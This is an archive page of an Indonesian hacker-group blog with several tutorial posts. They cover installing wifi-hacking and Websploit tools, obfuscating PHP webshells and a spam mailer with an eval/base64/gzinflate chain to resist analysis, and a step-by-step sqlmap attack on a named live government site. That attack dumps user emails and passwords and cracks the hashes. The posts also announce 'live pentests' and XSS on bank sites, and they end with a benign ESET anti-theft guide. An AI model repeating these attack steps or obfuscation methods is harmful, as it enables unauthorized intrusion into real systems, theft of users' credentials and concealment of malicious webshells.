Archive for Juli 2017
Kali ini gw mau share tool spesial buat para kaum pemalas yaitu lscript atau The Lazy Script karya arismelachroinos tool ini dirancang khusus buat para hacker yang malas dan tujukan untuk pentest wifi dan hacking lainnya.
bagaimana cara mengintall nya ?
root@yukinoshita47:~# git clone https://github.com/Yukinoshita47/lscript
kemudian tekan enter maka akan muncul seperit gambar dibawah ini
setelah itu masukkan izin permission nya dengan menekan command
root@yukinoshita47:~# chmod +x lscript/
kemudian tekan enter
lalu masuk ke direktori lscript dengan perintah sebagai berikut
kemudian tekan enter
lalu install dengan menggunakan perintah
lalu tekan enter kemudian masukkan lagi perintah
root@yukinoshita47:~# ./install.sh
lalu tekan enter
tekan tombol apa saja untuk mulai install lscript nya
biarkan tool nya menjalankan proses menginstall
lalu tekan l buka terminal lagi dan masukkan perintah
lalu tekan enter untuk memulai
tekan tombol apa saja untuk melanjutkan
tekan YES lalu kemudian tekan enter
setting interface wifi nya sebagai contoh seperti gambar dibawah ini
ketik wlan0 lalu tekan enter
kemudian ketik wlan0mon lalu tekan enter
setelah itu tekan tombol apa saja untuk memulai
jika muncul seperti ini maka instalasi tool Lazy Script sudah selesai dan siap digunakan
selanjut nya untuk menjalankan nya hanya dengan menekan l di terminal maka akan muncul tool nya
dokumentasi : https://github.com/Yukinoshita47/lscript
selain di kali linux di linux yang lainnya juga bisa kok :D namun saya uji coba di kali linux ini tool nya berjalan dengan baik :D
sekian dan terimakasih :*
Garuda Security Hacker Official Team
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel
Kali Linux : The Lazy Script
Kali ini gw mau share official statement tentang Live Pentest :
Documentation And Video Reporting
Live Pentest on Bank Site
Live XSS On Bank Site
Garuda Security Hacker Official Team
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel
Live Pentest on Bank Of Baroda Uganda
Tutorial Instalasi Websploit Framework di Ubuntu/Debian
_Tuan2Fay_ | blog.garudasecurityhacker.org - kali ini gw bakalan kasih tutorial singkat dan simple,, mungkin ga berguna juga :v yoshh,, simak aja tutorial nya
Step by Step :
1. Buka terminal,, terus login root# sudo su
2. Download dlu Websploit Frameworknya,,
# wget http://files.melodynl48.ga/WebSploit-Framework-3.0.0.tar.gz
tenang kok gak di campur apa2, ane cuma buat mirror sendiri supaya direct link
3. kita ekstrak file nya.
# tar xvf WebSploit-Framework-3.0.0.tar.gz
4. Sebelum install Websploit kita install dlu scapy
# apt-get install scapy
5. Lanjut install websploitnya
# cd websploit/
# ./install.sh
6. Done tinggal dibuka dah
# websploit
Dah gitu aja,, kaga pake gambar :v mudah mudahan bermanfaat.
kalo bingung atau mau tanya sesuatu silahkan Chat ke FP,, klo di komentar lama respon nya :v karena yg ngurus blog cuma ber3
Garuda Security Hacker Official Team
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel
Tutorial Instalasi Websploit Framework di Ubuntu/Debian
Tutorial Encode Script PHP
_Tuan2Fay_ | blog.garudasecurityhacker.org - yoshh apakabar,, sorry pake foto oshi soalnya gw bingung mau pake gambar apalagi biar menarik :v,, sesuai judul gw bakalan ngasih tutorial cara Encode Script PHP, berlaku juga Webshell yg di pake buat depes web,, kenapa di encode ? supaya gak mudah di Recode sama orng,, kalau pun mau ngeRecode ya harus di Decode dlu,, itu pun kalo berhasil. Ok langsung aja eue tutorial nya,,
Bahan Bahan :
1. Script PHP yang mau di Encode
2. Tool buat ngeEncode ( http://scriptencode.net/ )
3. Editor Text (Notepad, Gedit, Bluefish, Nano, dll)
Step by Step :
1. Baca Bismillah dlu kuy,,
2. Buka url Tool buat ngeEncode (link di atas)
3. Buka Script yg mau di encode
di sini saya pake script Mailer spam karya Lyonc (ntar script nya di post ke sini)
4. Copy code nya tapi jagan pake <?php (yg di atas) sama ?> (yang paling bawah) liat gambar biar rada seger
tapi kenapa saya gak bawa $auth_pass = 'md5 hash'; nya ? sengaja biar bisa di ganti2
5. Copy ke tool nya,, terus kita pilih type yg "base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64" aja,, terus langsung klik Encode
<?php
$file = 'isi dengan kode hasil encode';
eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($file)))))));
?>
save dengan format .php
Note : Kalo Script yang kalian encode ada session loginnya,, password yg ga di encode bisa di taro di atas $file, contoh
$auth_pass = 'md5 hash';
$file = 'hasil encode';
itu pun kalo memang ada atau sengaja ga ikut di encode,
segitu dlu aja yah,, cape ngetik + duduk lama2, mohon maaf klo sulit di pahami atau kurang detail tutorialnya,, kalau mau bertanya bisa komen di bawah atau chat ke FP kami kuy,,
Garuda Security Hacker Official Team
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel
Tutorial Encode Script PHP
Yo kembali lagi bersama gw yukinoshita 47 kali ini gw mau sharing tutorial tentang SQL Map banyak jg sih yg request sampe bosan gw denger nya wkwkwkwkwk.
oke kali ini live target tutorial nya http://dev2.kopertis7.go.id seperti gambar dibawah ini bug nya terletak di http://dev2.kopertis7.go.id/gallery_info.php?id=35
masukkan perintah
root@yukinoshita47:~# sqlmap -u http://situstarget.com --dbs
contoh :root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 --dbs
biarkan tool nya berjalan seperti gambar dibawa ini
jika muncul persetujuan buat lanjutkan eksekusi ketik y terus tekan enter seperti gambar dibawah ini
jika berhasil maka akan muncul seperti gambar dibawah ini :
lalu untuk melihat tabel dari database tersebut eksekusi perintah
root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --table
contohroot@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --table
kemudian tekan enter maka akan muncul seperti gambar dibawah ini.
selanjut nya untuk melihat isi dari tabel tersebut perintahnya adalah
root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --columns
contoh :root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --columns
kemudian tekan enter maka akan muncul seperti gambar dibawah ini.
setelah itu kolom-kolom dari tabel database tersebut akan kelihatan seperti gambar dibawah ini.
untuk melihat isi dari kolom dan tabel tadi adalah menggunakan perintah.
root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase -T namatabel -C namakolom --dump
contohroot@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb -T users -C email,password,user_id,username --dump
kemudian tekan enter dan akan muncul seperti gambar dibawah ini sqlmap akan meminta persetujuan untuk menggunakan tools lainnya disini saya iya kan dengan menekan y dan kemudian tekan enter
kemudian muncul lagi persetujuan untuk menggunakan metode dictionary attack atau bruteforce tekan aja y kemudian tekan enter.
kemudian ada 3 pilihan
- 1 menggunakan wordlist default bawaan sqlmap
- 2 menggunakan wordlist custom
- 3 menggunakan file wordlist
disini saya pilih aja default dengan menekan 1 kemudian tekan enter
kemudian akan muncul seperti gambar dibawah ini kali ini tergantung keinginan saja disini saya pilih tidak dengan menekan n kemudian tekan enter
biarkan sqlmap crack hash password nya
jika berhasil akan muncul seperti gambar dibawah ini.
oke untuk mencari dimana login nya ya seperti biasa kalian cari aja pake admin finder :p
untuk log pentest dari SQLMap di tutorial ini klik disini
oke cukup sampe disini tutorial nya sekian dan terimakasih
Garuda Security Hacker Official Team
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel
Kali Linux : SQL Injection dan Auto Crack Hash Password Dengan SQLMap
Kali ini gw Yukinoshita47 mau bahas mengenai mobile security sering kita temui masalah di perangkat Android kesayangan kita ini yaitu sebagai berikut :
- Malware / Virus
- Nebar Spam / Phising
- Iklan yang menguras kuota
- Tukang Ngintip privasi orang
- Maling ataupun Pencuri
- dan lain-lain
ESET Mobile Security
ESET Mobile Security dapat mengatasi masalah Malware dan sejenisnya
ESET Mobile Security juga dapat block aplikasi, file dan dokumen yang terinfeksi malware dan sejenis nya
ESET Mobile Security selalu update mengenai laporan keamanan
ESET Mobile Security sudah pasti anti phising dan mendeteksi website yang mengandung unsur phising
dengan ESET Mobile Security kita jadi gampang mau cek permission apps di smartphone android kita.
ESET Mobile Security dapan mengontrol semua nya dalam satu tempat
ESET Mobile Security terintregasi dengan situs web nya untuk melacak perangkat smartphone yang hilang atau dicuri
ESET Mobile Security rating nya juga lumayan tinggi
Fitur yang dimiliki oleh ESET Mobile Security
- Anti Virus
- Anti Phising
- Anti Pencurian
- Filtering SMS dan Telpon
- Pemeriksaan Keamanan / Security Audit
- Laporan Keamanan / Security Report
kali ini yang mau gw uji coba dalah fitu Anti Theft nya sebenarnya disini gw gak perlu jelasin dengan detail karena aplikasi mobile saat ini user friendly semua jadi gak perlu dijelasin udah ngerti sendiri.
punya smartphone auto update dan anti gaptek :p
gw jelasin secara singkat aja ya gimana cara menggunakan Anti Theft nya
pertama buka web portal
maka muncul seperti gambar dibawa ini lalu aktifkan dan pilih improve security
kemudian aktifkan semua nya :v
setting web portal selesai lanjut kemudian setting SIM Guard nya
langkah-langkah nya
- enable / aktifkan Guard
- enable / aktifkan Notify your friends
- Tambah kan trusted friend dengan menekan tombol + di pojok kiri bawah seperti gambar dibawah ini
NB : dengan mengisi nama dan nomor telpon nya bagian ini nomor hp orang terdekat yang bisa dipercaya
kemudian lanjut pilih menu settings
Pilih security password lalu masukkan password nya dan pilih save
setelah itu contact detail nya isi nama dan nomor hp backup / nomor hp orang yang terdekat dan dipercaya setelah itu save
lanjut ke SMS text Command ini ne yang mau gw uji coba dan inti utama dari pembahasan ini adalah fitur SMS text command.
pertama pilih SMS Password lalu masukin password nya contoh : 11223344 kemudian save
berikut daftar perintah sms commands nya
contoh disini saya menggunakan password : 11223344
fungsi dan cara menggunakan fitur nya
eset lock password untuk mengunci perangkat android
eset siren password untuk membunyikan alarm perangkat
androideset find password untuk melacak perangkat
androideset wipe password untuk menghapus data perangkat android
untuk mengeksekusinya kirim sms ke nomor hp yang ada diperangkat android yang sudah terinstall ESET mobile security contoh nomor hp nya : 0869696969
format nya sesuai di atas
kalo ingin mengunci ketik eset lock 11223344 kirim ke 0869696969
kalo ingin bunyikan alarm ketik eset siren 11223344 kirim ke 0869696969
kalo ingin melacak ketik eset find 11223344 kirim ke 0869696969
kalo ingin hapus data ketik eset wipe 11223344 kirim ke 0869696969
contoh disini saya sms pakai hp lain untuk sms ke hp 0869696969
saya ingin mengunci dengan mengetik eset lock 11223344 kirim ke 0869696969 secara otomatis langsung mengunci perangkat nya
gambar dibawah ini adalah perangkat yang terkunci oleh ESET Mobile security
kalo mau membuka kuncian nya pilih unlock lalu masukkan password nya
lalu untuk melacak lokasi perangkat via sms Command yaitu untuk contoh dengan cara ketik eset find 11223344 kirim ke 0869696969 maka otomatis perangkat android tersebut membalas SMS Koordinat GPS Google map seperti gambar dibawah ini
gampang kan biar lebih jelas nya coba kalian praktekkan sendiri ya :D
sebagai pesan nya adalah tetap waspada dan jaga lah barang2 berharga kalian termasuk smartphone kalian dari para pencuri dan pihak yang tidak bertanggung jawab.
aktifkan selalu anti theft di perangkat kalian jika terjadi kemalingan ya masih bisa dilacak dan dikerjain itu maling bangsat
bisakah melacak, mengunci, membunyikan alarm, dan menghapus data di smartphone / perangkat android yang telah dicuri tanpa diinstall anti-theft sebelumnya jawaban nya TIDAK...!!!!!!!! JANGAN BERPIKIR KALO ADA AHLI IT DAN HACKER SEMUANYA JADI SERBA GAMPANG GITU MIKIR....!!!!
Garuda Security Hacker Official Team
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel
